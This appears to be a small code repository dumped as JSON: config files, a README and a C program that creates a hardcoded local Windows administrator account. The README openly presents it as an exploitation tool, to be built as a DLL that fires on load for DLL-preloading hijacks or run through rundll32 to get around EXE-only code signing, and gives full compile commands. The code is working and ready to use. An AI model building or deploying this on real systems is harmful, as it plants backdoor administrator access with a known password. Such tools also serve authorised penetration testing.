[
  {
    "path": ".gitattributes",
    "content": "# Auto detect text files and perform LF normalization\n* text=auto\n\n# Custom for Visual Studio\n*.cs     diff=csharp\n*.sln    merge=union\n*.csproj merge=union\n*.vbproj merge=union\n*.fsproj merge=union\n*.dbproj merge=union\n\n# Standard to msysgit\n*.doc\t diff=astextplain\n*.DOC\t diff=astextplain\n*.docx diff=astextplain\n*.DOCX diff=astextplain\n*.dot  diff=astextplain\n*.DOT  diff=astextplain\n*.pdf  diff=astextplain\n*.PDF\t diff=astextplain\n*.rtf\t diff=astextplain\n*.RTF\t diff=astextplain\n"
  },
  {
    "path": ".gitignore",
    "content": "#################\n## Eclipse\n#################\n\n*.pydevproject\n.project\n.metadata\nbin/\ntmp/\n*.tmp\n*.bak\n*.swp\n*~.nib\nlocal.properties\n.classpath\n.settings/\n.loadpath\n\n# External tool builders\n.externalToolBuilders/\n\n# Locally stored \"Eclipse launch configurations\"\n*.launch\n\n# CDT-specific\n.cproject\n\n# PDT-specific\n.buildpath\n\n\n#################\n## Visual Studio\n#################\n\n## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n\n# User-specific files\n*.suo\n*.user\n*.sln.docstates\n\n# Build results\n[Dd]ebug/\n[Rr]elease/\n*_i.c\n*_p.c\n*.ilk\n*.meta\n*.obj\n*.pch\n*.pdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.vspscc\n.builds\n*.dotCover\n\n## TODO: If you have NuGet Package Restore enabled, uncomment this\n#packages/\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opensdf\n*.sdf\n\n# Visual Studio profiler\n*.psess\n*.vsp\n\n# ReSharper is a .NET coding add-in\n_ReSharper*\n\n# Installshield output folder\n[Ee]xpress\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish\n\n# Others\n[Bb]in\n[Oo]bj\nsql\nTestResults\n*.Cache\nClientBin\nstylecop.*\n~$*\n*.dbmdl\nGenerated_Code #added for RIA/Silverlight projects\n\n# Backup & report files from converting an old project file to a newer\n# Visual Studio version. Backup files are not needed, because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\n\n\n\n############\n## Windows\n############\n\n# Windows image file caches\nThumbs.db\n\n# Folder config file\nDesktop.ini\n\n\n#############\n## Python\n#############\n\n*.py[co]\n\n# Packages\n*.egg\n*.egg-info\ndist\nbuild\neggs\nparts\nbin\nvar\nsdist\ndevelop-eggs\n.installed.cfg\n\n# Installer logs\npip-log.txt\n\n# Unit test / coverage reports\n.coverage\n.tox\n\n#Translations\n*.mo\n\n#Mr Developer\n.mr.developer.cfg\n\n# Mac crap\n.DS_Store\n"
  },
  {
    "path": "README.md",
    "content": "# adduser\n\nProgrammatically creates a 'local admin' Windows user. Requires admin rights. The created user is hardcoded to the following:\n\nLogin: `audit`\nPassword: `Test123456789!` (this should be good enough to fit most password policies)\n\nThis standalone piece of code can run in many contexts:\n- As a command-line EXE.\n- As a DLL (the user will be created on DLL load). This is useful to exploit \"DLL Preloading\" issues.\n- As a DLL, through `rundll32.exe adduser.dll,CreateAdminUser@16`. This is useful to bypass mandatory code signing applied to EXE files only.\n\n## Compiling\n### Using MinGW (tested on macOS, but Linux should work)\n\n- Create a 32-bit EXE file:\n`i686-w64-mingw32-gcc -oadduser32.exe adduser.c -lnetapi32`\n- Create a 32-bit DLL file:\n`i686-w64-mingw32-gcc -shared -oadduser32.dll adduser.c -lnetapi32`\n- Create a 64-bit EXE file:\n`x86_64-w64-mingw32-gcc -oadduser64.exe adduser.c -lnetapi32`\n- Create a 64-bit DLL file:\n`x86_64-w64-mingw32-gcc -shared -oadduser64.dll adduser.c -lnetapi32`\n\n### Using Visual Studio (tested with VS2013)\n\n- Create an EXE file:\n`cl.exe adduser.c /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`\n- Create a DLL file:\n`cl.exe adduser.c /LD /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`"
  },
  {
    "path": "adduser.c",
    "content": "/*\n * ADDUSER.C: creating a Windows user programmatically.\n */\n\n#define UNICODE\n#define _UNICODE\n\n#include <windows.h>\n#include <string.h>\n#include <Lmaccess.h>\n#include <lmerr.h>\n#include <Tchar.h>\n\n\nDWORD CreateAdminUserInternal(void)\n{\nNET_API_STATUS rc;\nBOOL b;\nDWORD dw;\n\nUSER_INFO_1 ud;\nLOCALGROUP_MEMBERS_INFO_0 gd;\nSID_NAME_USE snu;\n\nDWORD cbSid = 256;\t// 256 bytes should be enough for everybody :)\nBYTE Sid[256];\n\nDWORD cbDomain = 256 / sizeof(TCHAR);\nTCHAR Domain[256];\n\n\t//\n\t// Create user\n\t// http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx\n\t//\n\n\tmemset(&ud, 0, sizeof(ud));\n\n\tud.usri1_name\t\t= _T(\"audit\");\t\t\t\t\t\t// username\n\tud.usri1_password\t= _T(\"Test123456789!\");\t\t\t\t// password\n\tud.usri1_priv\t\t= USER_PRIV_USER;\t\t\t\t\t// cannot set USER_PRIV_ADMIN on creation\n\tud.usri1_flags\t\t= UF_SCRIPT | UF_NORMAL_ACCOUNT;\t// must be set\n\tud.usri1_script_path = NULL;\n\n\trc = NetUserAdd(\n\t\tNULL,\t\t\t// local server\n\t\t1,\t\t\t\t// information level\n\t\t(LPBYTE)&ud,\n\t\tNULL\t\t\t// error value\n\t);\n\n\tif (rc != NERR_Success) {\n\t\t_tprintf(_T(\"NetUserAdd FAIL %d 0x%08x\\r\\n\"), rc, rc);\n\t\treturn rc;\n\t}\n\n\t//\n\t// Get user SID\n\t// http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx\n\t//\n\n\tb = LookupAccountName(\n\t\tNULL,\t\t\t// local server\n\t\t_T(\"audit\"),\t// account name\n\t\tSid,\t\t\t// SID\n\t\t&cbSid,\t\t\t// SID size\n\t\tDomain,\t\t\t// Domain\n\t\t&cbDomain,\t\t// Domain size\n\t\t&snu\t\t\t// SID_NAME_USE (enum)\n\t);\n\n\tif (!b) {\n\t\tdw = GetLastError();\n\t\t_tprintf(_T(\"LookupAccountName FAIL %d 0x%08x\\r\\n\"), dw, dw);\n\t\treturn dw;\n\t}\n\n\t//\n\t// Add user to \"Administrators\" local group\n\t// http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx\n\t//\n\n\tmemset(&gd, 0, sizeof(gd));\n\n\tgd.lgrmi0_sid = (PSID)Sid;\n\n\trc = NetLocalGroupAddMembers(\n\t\tNULL,\t\t\t\t\t// local server\n\t\t_T(\"Administrators\"),\n\t\t0,\t\t\t\t\t\t// information level\n\t\t(LPBYTE)&gd,\n\t\t1\t\t\t\t\t\t// only one entry\n\t);\n\n\tif (rc != NERR_Success) {\n\t\t_tprintf(_T(\"NetLocalGroupAddMembers FAIL %d 0x%08x\\r\\n\"), rc, rc);\n\t\treturn rc;\n\t}\n\n\treturn 0;\n}\n\n//\n// DLL entry point.\n//\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\t\tCreateAdminUserInternal();\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n//\n// RUNDLL32 entry point.\n// https://support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface\n//\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)\n{\n\tCreateAdminUserInternal();\n}\n\n#ifdef __cplusplus\n}\n#endif\n\n//\n// Command-line entry point.\n//\n\nint main()\n{\n\treturn CreateAdminUserInternal();\n}\n"
  }
]